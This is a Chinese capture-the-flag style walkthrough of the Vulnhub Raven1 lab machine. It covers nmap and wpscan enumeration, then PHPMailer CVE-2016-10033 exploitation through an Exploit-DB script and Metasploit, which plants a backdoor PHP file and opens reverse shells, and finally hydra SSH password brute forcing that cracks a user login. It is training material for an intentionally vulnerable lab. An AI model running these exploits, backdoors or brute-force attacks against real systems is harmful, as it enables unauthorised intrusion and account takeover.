Vulnhub靶机渗透:Raven1(超级详细)

Raven1

https://www.vulnhub.com/entry/raven-1,256/
kali:192.168.54.128
raven1:192.168.54.15

nmap扫描

端口扫描

# Nmap 7.93 scan initiated Thu May 18 16:41:33 2023 as: nmap --min-rate 20000 -p- -oN nmap/ports 192.168.54.15
Nmap scan report for 192.168.54.15
Host is up (0.00012s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
33921/tcp open  unknown
MAC Address: 00:0C:29:B5:8B:3B (VMware)

# Nmap done at Thu May 18 16:41:38 2023 -- 1 IP address (1 host up) scanned in 5.46 seconds

TCP扫描

# Nmap 7.93 scan initiated Thu May 18 16:42:12 2023 as: nmap -sT --min-rate 20000 -p- -oN nmap/tcp 192.168.54.15
Nmap scan report for 192.168.54.15
Host is up (0.00098s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
33921/tcp open  unknown
MAC Address: 00:0C:29:B5:8B:3B (VMware)

# Nmap done at Thu May 18 16:42:15 2023 -- 1 IP address (1 host up) scanned in 2.72 seconds

UDP扫描

# Nmap 7.93 scan initiated Thu May 18 16:43:40 2023 as: nmap -sU --min-rate 20000 -p- -oN nmap/udp 192.168.54.15
Warning: 192.168.54.15 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.54.15
Host is up (0.00055s latency).
Not shown: 65496 open|filtered udp ports (no-response), 37 closed udp ports (port-unreach)
PORT      STATE SERVICE
111/udp   open  rpcbind
45827/udp open  unknown
MAC Address: 00:0C:29:B5:8B:3B (VMware)

# Nmap done at Thu May 18 16:44:17 2023 -- 1 IP address (1 host up) scanned in 36.76 seconds

服务扫描

# Nmap 7.93 scan initiated Thu May 18 16:46:09 2023 as: nmap -sV -p22,80,111,33921 -oN nmap/services 192.168.54.15
Nmap scan report for 192.168.54.15
Host is up (0.00029s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
33921/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:B5:8B:3B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 18 16:46:21 2023 -- 1 IP address (1 host up) scanned in 12.17 seconds

脚本扫描

# Nmap 7.93 scan initiated Thu May 18 16:47:25 2023 as: nmap -sC -p22,80,111,33921 -oN nmap/script 192.168.54.15
Nmap scan report for 192.168.54.15
Host is up (0.00024s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
| ssh-hostkey: 
|   1024 2681c1f35e01ef93493d911eae8b3cfc (DSA)
|   2048 315801194da280a6b90d40981c97aa53 (RSA)
|   256 1f773119deb0e16dca77077684d3a9a0 (ECDSA)
|_  256 0e8571a8a2c308699c91c03f8418dfae (ED25519)
80/tcp    open  http
|_http-title: Raven Security
111/tcp   open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33921/tcp   status
|   100024  1          45827/udp   status
|   100024  1          49961/udp6  status
|_  100024  1          57761/tcp6  status
33921/tcp open  status
MAC Address: 00:0C:29:B5:8B:3B (VMware)

# Nmap done at Thu May 18 16:47:26 2023 -- 1 IP address (1 host up) scanned in 0.99 seconds
# Nmap 7.93 scan initiated Thu May 18 16:48:01 2023 as: nmap --script=vuln -p22,80,111,33921 -oN nmap/vuln 192.168.54.15
Nmap scan report for 192.168.54.15
Host is up (0.00036s latency).

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wordpress/: Blog
|   /wordpress/wp-login.php: Wordpress login page.
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|   /manual/: Potentially interesting folder
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.54.15
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.54.15:80/
|     Form id: 
|     Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
|     
|     Path: http://192.168.54.15:80/about.html
|     Form id: 
|_    Form action: https://spondonit.us12.list-manage.com/subscribe/post?u=1462626880ade1ac87bd9c93a&id=92a4423d01
111/tcp   open  rpcbind
33921/tcp open  unknown
MAC Address: 00:0C:29:B5:8B:3B (VMware)

# Nmap done at Thu May 18 16:48:33 2023 -- 1 IP address (1 host up) scanned in 32.53 seconds

漏洞发现

web渗透

发现有80端口,去访问一下。
Vulnhub靶机渗透:Raven1(超级详细)_第1张图片

目录爆破

$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,html,rar,txt,sql,jsp,php --url http://192.168.54.15/ --no-error | tee gobuster.log 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.15/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,html,rar,txt,sql,jsp,php
[+] Timeout:                 10s
===============================================================
2023/05/18 16:53:29 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 16819]
/.php                 (Status: 403) [Size: 292]
/.html                (Status: 403) [Size: 293]
/about.html           (Status: 200) [Size: 13265]
/contact.php          (Status: 200) [Size: 9699]
/contact.zip          (Status: 200) [Size: 3384]
/img                  (Status: 301) [Size: 312] [--> http://192.168.54.15/img/]
/service.html         (Status: 200) [Size: 11166]
/css                  (Status: 301) [Size: 312] [--> http://192.168.54.15/css/]
/wordpress            (Status: 301) [Size: 318] [--> http://192.168.54.15/wordpress/]
/team.html            (Status: 200) [Size: 15449]
/manual               (Status: 301) [Size: 315] [--> http://192.168.54.15/manual/]
/js                   (Status: 301) [Size: 311] [--> http://192.168.54.15/js/]
/vendor               (Status: 301) [Size: 315] [--> http://192.168.54.15/vendor/]
/elements.html        (Status: 200) [Size: 35226]
/fonts                (Status: 301) [Size: 314] [--> http://192.168.54.15/fonts/]
/.php                 (Status: 403) [Size: 292]
/.html                (Status: 403) [Size: 293]
/server-status        (Status: 403) [Size: 301]

===============================================================
2023/05/18 16:57:03 Finished
===============================================================

发现了wordpress,那就用wpscan扫描下。

wpscan

$ wpscan --url http://192.168.54.15/wordpress/ -e u                               
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.54.15/wordpress/ [192.168.54.15]
[+] Started: Fri May 19 12:04:02 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.54.15/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.54.15/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.54.15/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:04 <==========================> (1199 / 1199) 100.00% Time: 00:00:04
[i] The WordPress version could not be detected.

[i] The main theme could not be detected.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] michael
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] steven
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri May 19 12:04:10 2023
[+] Requests Done: 1588
[+] Cached Requests: 11
[+] Data Sent: 460.573 KB
[+] Data Received: 7.188 MB
[+] Memory used: 151.137 MB
[+] Elapsed time: 00:00:07

发现了用户stevenmichael。继续浏览web目录爆破信息。发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。发现该文件存在了一个mail服务,具体为phpmailer。
Vulnhub靶机渗透:Raven1(超级详细)_第2张图片
继续阅读目录爆破得到的信息。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。发现PATH、VERSION文件,查看下。发现路径是/var/www/html/vendor/,版本是5.2.16

phpmailer:漏洞利用

1、使用searchsploit工具

使用`searchsploit搜索漏洞,发现phpmailer存在rce漏洞。下载下来一个试一试。
Vulnhub靶机渗透:Raven1(超级详细)_第3张图片

# yunki @ yunki in ~/vulnhub/raven1 [14:37:47] C:130
$ searchsploit phpmailer -m 40974
[!] Could not find EDB-ID #


  Exploit: PHPMailer < 5.2.18 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/40974
     Path: /usr/share/exploitdb/exploits/php/webapps/40974.py
    Codes: CVE-2016-10033
 Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/yunki/vulnhub/raven1/40974.py

查看poc内容,根据实际情况进行修改。
Vulnhub靶机渗透:Raven1(超级详细)_第4张图片
修改成如下内容。然后运行。
Vulnhub靶机渗透:Raven1(超级详细)_第5张图片

# yunki @ yunki in ~/vulnhub/raven1 [14:40:44] C:130
$ python3 40974.py


 █████╗ ███╗   ██╗ █████╗ ██████╗  ██████╗ ██████╗ ██████╗ ███████╗██████╗ 
██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗
███████║██╔██╗ ██║███████║██████╔╝██║     ██║   ██║██║  ██║█████╗  ██████╔╝
██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║     ██║   ██║██║  ██║██╔══╝  ██╔══██╗
██║  ██║██║ ╚████║██║  ██║██║  ██║╚██████╗╚██████╔╝██████╔╝███████╗██║  ██║
╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝  ╚═╝
      PHPMailer Exploit CVE 2016-10033 - anarcoder at protonmail.com
 Version 1.0 - github.com/anarcoder - greetings opsxcq & David Golunski

[+] SeNdiNG eVIl SHeLL To TaRGeT....
[+] SPaWNiNG eVIL sHeLL..... bOOOOM :D
[+]  ExPLoITeD http://192.168.54.15/contact.php

# yunki @ yunki in ~/vulnhub/raven1 [14:36:36] 
$ 

到这里还不算结束,需要去web端访问一下自己构造的php页面,我这里是:http://192.168.54.15/bd.php,记得访问之前开启端口监听。

# yunki @ yunki in ~/vulnhub/raven1 [14:42:07] 
$ sudo nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.15] 38092
/bin/sh: 0: can't access tty; job control turned off
$ 
$ whoami
www-data
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:8b:3b brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:8b3b/64 scope link 
       valid_lft forever preferred_lft forever

2、使用metasploit工具

# yunki @ yunki in ~/vulnhub/raven1 [14:54:52] C:127
$ msfconsole 
                                                  

      .:okOOOkdc'           'cdkOOOko:.                                                                                                                                   
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.                                                                                                                                 
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:                                                                                                                                
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'                                                                                                                               
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo                                                                                                                               
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx                                                                                                                               
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl                                                                                                                               
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.                                                                                                                               
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc                                                                                                                                
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo                                                                                                                                 
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl                                                                                                                                  
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;                                                                                                                                   
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.                                                                                                                                    
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,                                                                                                                                      
           :kk;.OOOOOOOOOOOOO.;Ok:                                                                                                                                        
             ;kOOOOOOOOOOOOOOOk:                                                                                                                                          
               ,xOOOOOOOOOOOx,                                                                                                                                            
                 .lOOOOOOOl.                                                                                                                                              
                    ,dOd,                                                                                                                                                 
                      .                                                                                                                                                   

       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2295 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: You can use help to view all 
available commands
Metasploit Documentation: https://docs.metasploit.com/

msf6 > search phpmailer

Matching Modules
================

   #  Name                                          Disclosure Date  Rank     Check  Description
   -  ----                                          ---------------  ----     -----  -----------
   0  exploit/multi/http/phpmailer_arg_injection    2016-12-26       manual   No     PHPMailer Sendmail Argument Injection
   1  exploit/unix/webapp/wp_phpmailer_host_header  2017-05-03       average  Yes    WordPress PHPMailer Host Header Command Injection


Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/webapp/wp_phpmailer_host_header

msf6 > info 0

       Name: PHPMailer Sendmail Argument Injection
     Module: exploit/multi/http/phpmailer_arg_injection
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Manual
  Disclosed: 2016-12-26

Provided by:
  Dawid Golunski
  Spencer McIntyre

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHPMailer <5.2.18
      1   PHPMailer 5.2.18 - 5.2.19

Check supported:
  No

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT       80               yes       The target port (TCP)
  SSL         false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI   /                yes       Path to the application root
  TRIGGERURI                   no        Path to the uploaded payload
  VHOST                        no        HTTP server virtual host
  WEB_ROOT    /var/www         yes       Path to the web root

Payload information:

Description:
  PHPMailer versions up to and including 5.2.19 are affected by a 
  vulnerability which can be leveraged by an attacker to write a file 
  with partially controlled contents to an arbitrary location through 
  injection of arguments that are passed to the sendmail binary. This 
  module writes a payload to the web root of the webserver before then 
  executing it with an HTTP request. The user running PHPMailer must 
  have write access to the specified WEB_ROOT directory and successful 
  exploitation can take a few minutes.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2016-10033
  https://nvd.nist.gov/vuln/detail/CVE-2016-10045
  https://www.exploit-db.com/exploits/40968
  https://www.exploit-db.com/exploits/40969
  https://github.com/opsxcq/exploit-CVE-2016-10033
  https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html


View the full module info with the info -d command.

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/phpmailer_arg_injection) > show options

Module options (exploit/multi/http/phpmailer_arg_injection):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Path to the application root
   TRIGGERURI                   no        Path to the uploaded payload
   VHOST                        no        HTTP server virtual host
   WEB_ROOT    /var/www         yes       Path to the web root


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.54.128   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHPMailer <5.2.18



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/phpmailer_arg_injection) > set RHOSTS 192.168.54.15
RHOSTS => 192.168.54.15
msf6 exploit(multi/http/phpmailer_arg_injection) > set TARGETURI /contact.php
TARGETURI => /contact.php
msf6 exploit(multi/http/phpmailer_arg_injection) > set WEB_ROOT /var/www/html
WEB_ROOT => /var/www/html
msf6 exploit(multi/http/phpmailer_arg_injection) > set LHOST 192.168.54.128
LHOST => 192.168.54.128
msf6 exploit(multi/http/phpmailer_arg_injection) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/http/phpmailer_arg_injection) > run

[*] Started reverse TCP handler on 192.168.54.128:4444 
[*] Writing the backdoor to /var/www/html/z3Kj4snF.php
[*] Sleeping before requesting the payload from: /contact.php/z3Kj4snF.php
[*] Waiting for up to 300 seconds to trigger the payload

当看到这个时,去访问一下这个页面http://192.168.54.15/z3Kj4snF.php
最后在msf端就会有以下内容:

[*] Started reverse TCP handler on 192.168.54.128:4444 
[*] Writing the backdoor to /var/www/html/z3Kj4snF.php
[*] Sleeping before requesting the payload from: /contact.php/z3Kj4snF.php
[*] Waiting for up to 300 seconds to trigger the payload
[*] Sending stage (39927 bytes) to 192.168.54.15
[+] Deleted /var/www/html/z3Kj4snF.php
[*] Meterpreter session 2 opened (192.168.54.128:4444 -> 192.168.54.15:38117) at 2023-05-19 15:05:54 +0800
meterpreter > sysinfo
Computer    : Raven
OS          : Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64
Meterpreter : php/linux
meterpreter > whoami
[-] Unknown command: whoami
meterpreter > shell
Process 2635 created.
Channel 0 created.
whoami
www-data
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b5:8b:3b brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.15/24 brd 192.168.54.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:feb5:8b3b/64 scope link 
       valid_lft forever preferred_lft forever

输入shell,这样就获取shell啦。

获取其他立足点

在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?

wordpress

目录爆破

# yunki @ yunki in ~/vulnhub/raven1 [15:14:28] 
$ gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,html,rar,txt,sql,jsp,php --url http://192.168.54.15/wordpress/ --no-error | tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.15/wordpress/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,html,rar,txt,sql,jsp,php
[+] Timeout:                 10s
===============================================================
2023/05/19 15:14:48 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 302]
/.html                (Status: 403) [Size: 303]
/wp-content           (Status: 301) [Size: 329] [--> http://192.168.54.15/wordpress/wp-content/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.54.15/wordpress/]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 330] [--> http://192.168.54.15/wordpress/wp-includes/]
/wp-login.php         (Status: 200) [Size: 2537]
/readme.html          (Status: 200) [Size: 7413]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 327] [--> http://192.168.54.15/wordpress/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.php                 (Status: 403) [Size: 302]
/.html                (Status: 403) [Size: 303]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://raven.local/wordpress/wp-login.php?action=register]
Progress: 1761906 / 1764488 (99.85%)
===============================================================
2023/05/19 15:18:44 Finished
===============================================================

扫描到后台,尝试弱密码登录,发现失败。

尝试爆破

使用hydra爆破,等了很久也没成功。

# yunki @ yunki in ~/vulnhub/raven1 [15:39:36] 
$ hydra -l michael -P /usr/share/wordlists/rockyou.txt 192.168.54.15 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&Login=Login:incorrect"   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

# yunki @ yunki in ~/vulnhub/raven1 [15:39:36] 
$ hydra -l steven -P /usr/share/wordlists/rockyou.txt 192.168.54.15 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&Login=Login:incorrect"   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

但通过www-data发现,靶机里存在michael和steven用户。

$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Raven:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
statd:x:106:65534::/var/lib/nfs:/bin/false
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
michael:x:1000:1000:michael,,,:/home/michael:/bin/bash
smmta:x:108:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:109:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:110:116:MySQL Server,,,:/nonexistent:/bin/false
steven:x:1001:1001::/home/steven:/bin/sh
www-data@Raven:/var/www/html$ 

那这里重新尝试hydra爆破一下ssh。!!不到一会就成功找到ssh登录密钥。

# yunki @ yunki in ~/vulnhub/raven1 [15:43:01] 
$ hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://192.168.54.15 -V
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-19 15:43:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.54.15:22/
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "password" - 4 of 14344399 [child 3] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "princess" - 6 of 14344399 [child 5] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "654321" - 17 of 14344399 [child 5] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "michael" - 18 of 14344399 [child 11] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "ashley" - 19 of 14344399 [child 6] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "qwerty" - 20 of 14344399 [child 7] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "111111" - 21 of 14344399 [child 8] (0/0)
[ATTEMPT] target 192.168.54.15 - login "michael" - pass "iloveu" - 22 of 14344399 [child 9] (0/0)
[22][ssh] host: 192.168.54.15   login: michael   password: michael
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-19 15:43:18

尝试登录。成功!

# yunki @ yunki in ~/vulnhub/raven1 [15:44:41] C:130
$ ssh [email protected]
[email protected]'s password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

